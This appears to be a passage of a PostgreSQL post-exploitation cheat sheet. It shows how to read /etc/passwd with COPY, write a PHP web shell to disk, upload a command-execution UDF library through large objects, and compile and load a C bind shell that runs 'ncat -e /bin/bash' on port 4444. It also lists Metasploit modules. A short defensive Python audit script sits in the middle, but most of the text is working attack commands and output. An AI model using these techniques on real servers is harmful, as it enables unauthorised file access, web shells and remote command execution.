  \unset NAME            unset (delete) internal variable

Large Objects
  \lo_export LOBOID FILE
  \lo_import FILE [COMMENT]
  \lo_list
  \lo_unlink LOBOID      large object operations

```

----

### LIST DATABASES ###

```
postgres=# \l
                                  List of databases
   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-----------+----------+----------+-------------+-------------+-----------------------
 msfdb     | msfuser  | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
 template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
(4 rows)

```

----

### LIST DATABASE USERS ###

```
postgres=# \du
                             List of roles
 Role name |                   Attributes                   | Member of
-----------+------------------------------------------------+-----------
 msfuser   |                                                | {}
 postgres  | Superuser, Create role, Create DB, Replication | {}

```

Use the other informational commands listed above (\d, \dn, \dp, \dx and so on) to collect more details about the PostgreSQL database.


----

## LIST DIRECTORY ##

```
postgres=# select pg_ls_dir('/etc');
ERROR:  absolute path not allowed
postgres=# select pg_ls_dir('./');
      pg_ls_dir       
----------------------
 postmaster.opts
 postmaster.pid
 pg_logical
 pg_clog
 postgresql.auto.conf
 pg_hba.conf
 cmd.so
 pg_multixact
 postgresql.conf
 pg_ident.conf
 global
 pg_stat_tmp
 PG_VERSION
 pg_dynshmem
 pg_twophase
 pg_xlog
 pg_notify
 pg_snapshots
 pg_tblspc
 pg_serial
 pg_stat
 base
 pg_subtrans
 pg_replslot
(24 rows)

```

----

## READ FILE ##

**method1**

```
postgres=# select pg_read_file('postgresql.conf', 0, 200);
                pg_read_file                
--------------------------------------------
 # -----------------------------           +
 # PostgreSQL configuration file           +
 # -----------------------------           +
 #                                         +
 # This file consists of lines of the form:+
 #                                         +
 #   name = value                          +
 #                                         +
 # (The "=" is optional.)  Whitespace m
(1 row)

```

**method2**

```
postgres=# drop table pwn;
ERROR:  table "pwn" does not exist
postgres=# CREATE TABLE pwn(t TEXT);
CREATE TABLE
postgres=# COPY pwn FROM '/etc/passwd';
COPY 27
postgres=# SELECT * FROM pwn limit 1 offset 0;
                t                
---------------------------------
 root:x:0:0:root:/root:/bin/bash
(1 row)

postgres=# SELECT * FROM pwn;
                                      t                                       
------------------------------------------------------------------------------
 root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/usr/bin/nologin
 daemon:x:2:2:daemon:/:/usr/bin/nologin
 mail:x:8:12:mail:/var/spool/mail:/usr/bin/nologin
 ftp:x:14:11:ftp:/srv/ftp:/usr/bin/nologin
 http:x:33:33:http:/srv/http:/usr/bin/nologin
 uuidd:x:68:68:uuidd:/:/usr/bin/nologin
 dbus:x:81:81:dbus:/:/usr/bin/nologin
 nobody:x:99:99:nobody:/:/usr/bin/nologin
 systemd-journal-gateway:x:191:191:systemd-journal-gateway:/:/usr/bin/nologin
 systemd-timesync:x:192:192:systemd-timesync:/:/usr/bin/nologin
 systemd-network:x:193:193:systemd-network:/:/usr/bin/nologin
 systemd-bus-proxy:x:194:194:systemd-bus-proxy:/:/usr/bin/nologin
 systemd-resolve:x:195:195:systemd-resolve:/:/usr/bin/nologin
 systemd-journal-remote:x:999:999:systemd Journal Remote:/:/sbin/nologin
 systemd-journal-upload:x:998:998:systemd Journal Upload:/:/sbin/nologin
 avahi:x:84:84:avahi:/:/bin/false
 polkitd:x:102:102:Policy Kit Daemon:/:/bin/false
 git:x:997:997:git daemon user:/:/bin/bash
 colord:x:124:124::/var/lib/colord:/bin/false
 postgres:x:88:88:PostgreSQL user:/var/lib/postgres:/bin/bash
 lab:x:1000:1000::/home/notfound:/bin/bash
 stunnel:x:16:16::/var/run/stunnel:/bin/false
 dnsmasq:x:996:996:dnsmasq daemon:/:/usr/bin/nologin
 mongodb:x:995:2::/var/lib/mongodb:/bin/bash
 mysql:x:89:89::/var/lib/mysql:/bin/false
 sslh:x:994:994::/:/sbin/nologin
(27 rows)

postgres=# DROP table pwn;

```
----

## WRITE FILE ##

```
postgres=# DROP TABLE pwn;
DROP TABLE
postgres=# CREATE TABLE pwn (t TEXT);
CREATE TABLE
postgres=# INSERT INTO pwn(t) VALUES ('<?php @system("$_GET[cmd]");?>');
INSERT 0 1
postgres=# SELECT * FROM pwn;
               t                
--------------------------------
 <?php @system("$_GET[cmd]");?>
(1 row)

postgres=# COPY pwn(t) TO '/tmp/cmd.php';
COPY 1
postgres=# DROP TABLE pwn;
DROP TABLE
```


----

## UDF HACK ##


### COMPILE SOURCE ###

```
lab: / $ git clone https://github.com/sqlmapproject/udfhack/
```

```
lab: / $ gcc lib_postgresqludf_sys.c -I`pg_config --includedir-server` -fPIC -shared -o udf64.so
lab: / $ gcc -Wall -I/usr/include/postgresql/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so
lab: / $ strip -sx lib_postgresqludf_sys.so
```

### COMMAND EXECUTION ###

Transform udf.so into a hex string (the `hex` helper used below is not a standard tool; `xxd -p` gives the same plain hex dump).

```
lab:~/ $ cat udf.so | hex
```

Upload udf.so using the database's large-object features.

```
postgres=# INSERT INTO pg_largeobject (loid, pageno, data) VALUES (19074, 0, decode('079c...', 'hex'));
INSERT 0 1


postgres=# SELECT lo_export(19074, 'cmd.so');
ERROR:  pg_largeobject entry for OID 19074, page 0 has invalid data field size 3213
postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';
        setting         
------------------------
 /var/lib/postgres/data
(1 row)
```

The library is too large for a single large-object page: each page holds at most LOBLKSIZE bytes (2048 by default), so the file has to be split into consecutive pages. Please read https://github.com/sqlmapproject/sqlmap/issues/1170.

```
postgres=# select * from pg_largeobject;
 loid | pageno | data
------+--------+------
(0 rows)

postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';
        setting         
------------------------
 /var/lib/postgres/data
(1 row)

postgres=# SELECT lo_creat(-1);
 lo_creat
----------
    19075
(1 row)

postgres=# SELECT lo_create(11122);
 lo_create
-----------
     11122
(1 row)

postgres=# select * from pg_largeobject;
 loid | pageno | data
------+--------+------
(0 rows)

postgres=# INSERT INTO pg_largeobject VALUES (11122, 0, decode('079c...', 'hex'));
INSERT 0 1
postgres=# INSERT INTO pg_largeobject VALUES (11122, 1, decode('a28e...', 'hex'));
INSERT 0 1
postgres=# INSERT INTO pg_largeobject VALUES (11122, 2, decode('1265...', 'hex'));
INSERT 0 1
postgres=# INSERT INTO pg_largeobject VALUES (11122, 3, decode('c62e...', 'hex'));
INSERT 0 1
postgres=# SELECT lo_export(11122, '/tmp/cmd.so');
 lo_export
-----------
         1
(1 row)

postgres=# SELECT lo_unlink(11122);
 lo_unlink
-----------
         1
(1 row)

```
The library is now uploaded; next, create the PostgreSQL functions that point at it.

```
postgres=# CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/udf64.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
CREATE FUNCTION
postgres=# CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/udf64.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
CREATE FUNCTION
```

Execute commands with **sys\_exec**; it returns only the exit status, not the command output.

```
postgres=# SELECT sys_exec('id');
 sys_exec
----------
        0
(1 row)
```

Drop the functions after command execution.

```
postgres=# DROP FUNCTION sys_exec(text);
DROP FUNCTION
postgres=# DROP FUNCTION sys_eval(text);
DROP FUNCTION

```
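As an added, defender-side example (not code from these notes or from udfhack): a Python audit that reassembles rows dumped from pg_largeobject, flags pages above the 2048-byte LOBLKSIZE that make lo_export fail with "invalid data field size", and labels objects that start with an ELF header or a PHP tag. The sample rows are constructed; AUDIT_SQL is the equivalent check run directly in the database.

```python
from collections import defaultdict

LOBLKSIZE = 2048  # default large-object page size (BLCKSZ / 4)

# Audit query a DBA can run as-is; the hex literals are the ELF magic and "<?php".
AUDIT_SQL = """
SELECT loid, count(*) AS pages, sum(length(data)) AS bytes,
       bool_or(pageno = 0 AND substring(data from 1 for 4) = '\\x7f454c46'::bytea) AS elf,
       bool_or(pageno = 0 AND substring(data from 1 for 5) = '\\x3c3f706870'::bytea) AS php
FROM pg_largeobject GROUP BY loid;
"""

def reassemble(rows):
    """Join (loid, pageno, data) rows per loid in pageno order.
    Returns {loid: (blob, oversized)}; oversized lists pages larger than
    LOBLKSIZE, which lo_export rejects with 'invalid data field size'."""
    pages = defaultdict(dict)
    for loid, pageno, data in rows:
        pages[loid][pageno] = bytes(data)
    result = {}
    for loid, pmap in pages.items():
        blob = b"".join(pmap[p] for p in sorted(pmap))
        result[loid] = (blob, [p for p in sorted(pmap) if len(pmap[p]) > LOBLKSIZE])
    return result

def classify(blob):
    """Label the reassembled content, or return None when nothing matches."""
    if blob.startswith(b"\x7fELF"):
        return "elf-shared-object"
    if b"<?php" in blob[:64]:
        return "php-source"
    return None

def audit(rows):
    """Return {loid: {"label", "size", "oversized"}} for objects worth a look."""
    findings = {}
    for loid, (blob, oversized) in reassemble(rows).items():
        label = classify(blob)
        if label or oversized:
            findings[loid] = {"label": label, "size": len(blob), "oversized": oversized}
    return findings

# Constructed sample rows: a 5000-byte fake ELF split into 2048-byte pages (as in
# the notes), the oversized single-page first attempt (3213 bytes), and a PHP
# one-liner like the one written with COPY ... TO '/tmp/cmd.php'.
FAKE_ELF = b"\x7fELF" + b"\x00" * 4996
SAMPLE_ROWS = [(11122, i, FAKE_ELF[i * LOBLKSIZE:(i + 1) * LOBLKSIZE]) for i in range(3)]
SAMPLE_ROWS.append((19074, 0, b"\x7fELF" + b"\x00" * 3209))
SAMPLE_ROWS.append((11123, 0, b'<?php @system("$_GET[cmd]");?>'))
print(audit(SAMPLE_ROWS))
```

Against a live server, feed the result of `SELECT loid, pageno, data FROM pg_largeobject` to `audit()`, or run `AUDIT_SQL` as a superuser; an ELF object owned by an application role is a strong indicator of staging like the transcript above.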

### BIND SHELL ###

```
// bind shell on port 4444
#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

text *exec()
{
    system("ncat -e /bin/bash -l -p 4444");
}

```
Compile the source code:

```
lab:postgres_cmd/ $  vim nc.c
lab:postgres_cmd/ $  gcc nc.c -I`pg_config --includedir-server` -fPIC -shared -o nc.so
lab:postgres_cmd/ $  strip -sx nc.so
```

Copy nc.so into PostgreSQL's private /tmp (the systemd PrivateTmp directory shown below), or upload the .so file with the large-object features shown above.

```
lab:postgres_cmd/ $  sudo cp nc.so /tmp/systemd-private-374c1bd49d5f425ca21cca8cc6d89de7-postgresql.service-SKrVjI/tmp/nc.so
```

Create the FUNCTION `exec` for the bind shell, then connect from the client to the target.

```
postgres=# CREATE OR REPLACE FUNCTION exec() RETURNS text AS  '/tmp/nc.so', 'exec' LANGUAGE C STRICT;
CREATE FUNCTION
postgres=# SELECT exec();
server closed the connection unexpectedly
    This probably means the server terminated abnormally
    before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.

```

----


## METASPLOIT POSTGRESQL MODULES ##

```
use auxiliary/admin/postgres/postgres_readfile
use auxiliary/admin/postgres/postgres_sql
use auxiliary/scanner/postgres/postgres_dbname_flag_injection
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/postgres/postgres_version
use auxiliary/server/capture/postgresql
use exploit/linux/postgres/postgres_payload
use exploit/windows/postgres/postgres_payload
```



# REFERENCES #

https://github.com/sqlmapproject/udfhack/  
https://github.com/sqlmapproject/sqlmap/issues/1170   
http://zone.wooyun.org/content/4971  
http://drops.wooyun.org/tips/6449  
http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html  